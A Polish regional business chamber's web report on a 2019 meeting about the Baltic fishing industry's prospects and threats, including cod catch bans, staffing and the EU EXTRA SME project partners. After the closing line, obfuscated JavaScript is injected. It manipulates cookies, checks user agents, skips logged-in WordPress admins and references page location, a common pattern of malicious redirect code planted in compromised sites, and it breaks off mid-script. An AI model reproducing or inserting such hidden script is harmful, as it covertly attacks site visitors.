Szanse i zagrożenia dla branży rybołówstwa – relacja z I spotkania | Północna Izba Gospodarcza w Koszalinie

28 sierpnia w Restauracji Park Caffe w Koszalinie odbyło się spotkanie przedsiębiorców z branży przetwórstwa rybnego, hodowców ryb, instytucji okołobiznesowych ze sfery rybołówstwa pt. „Szanse i zagrożenia dla branży rybołówstwa 2019-2021”.

W trakcie spotkania została przeanalizowana aktualna sytuacja rybołówstwa oraz zasobów Morza Bałtyckiego. Pan Grzegorz Hołubek Prezes Związku Rybaków Polskich przedstawił badania prowadzone przez Panią dr hab. inż. Marianna Pastuszak, prof. Morskiego Instytutu Rybackiego – Państwowego Instytutu Badawczego w Gdyni dotyczące Monitoringu i zagrożeń chemicznych Bałtyku.

Poruszona została również kwestia zakazu połowu dorsza, limitów połowowych oraz utrudnionych przepisów UE dotyczących dofinansowania modernizacji jednostek. W dalszej części omówiono problematykę kadrową, spowodowana zaniechaniem szkolnictwa zawodowego, a także różnicę w wynagrodzeniach polskich i zagranicznych nie tylko finansowym, ale również pod względem stanowisk. W ostatniej części poruszono kwestię promocji konsumpcji ryb. Zauważono, że będzie co raz trudniej promować Polskie ryby, skoro jest ich co raz mniej, a ich jakość spada spowodowana różnymi czynnikami w tym m.in. ociepleniem klimatu oraz brakiem wlewów.

Po przygotowaniu wniosków, zostaną one przesłane do Ministerstwa Gospodarki Morskiej i Żeglugi Śródlądowej oraz Eurodeputowanych.

Północna Izba Gospodarcza w Koszalinie przystąpiła do projektu EXTRA SME, której celem jest wsparcie branży akwakultury, poprawa polityki mającej na celu zwiększenie konkurencyjności MŚP na obszarach przybrzeżnych i wiejskich UE, promowanie na rynkach UE produktów polskich oraz uproszczenia administracyjne sprzyjające rozwojowi branży.

PARTNERZY PROJEKTU

  • Region Peloponez, Grecja – lider projektu
  • Region Liguria, Włochy
  • Północna Izba Gospodarcza w Szczecinie, Polska
  • Agencja Rozwoju Regionalnego Bukareszt-Ilfov, Rumunia
  • Lapland Uniwersytet Nauk Stosowanych, Finlandia
  • Uniwersytet w Patras, Grecja
  • Zachodnia Komisja Rozwoju, Irlandia
  • Liguria, Klaster Technologii Morskich, Włochy
  • Agencja Rozwoju Regionów Krajowych, Litwa

Do pobrania: Raport z I spotkania Extra SME – 28 sierpnia 2019

Dziękujemy za Państwa przybycie i zapraszamy na kolejne spotkanie już we wrześniu. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m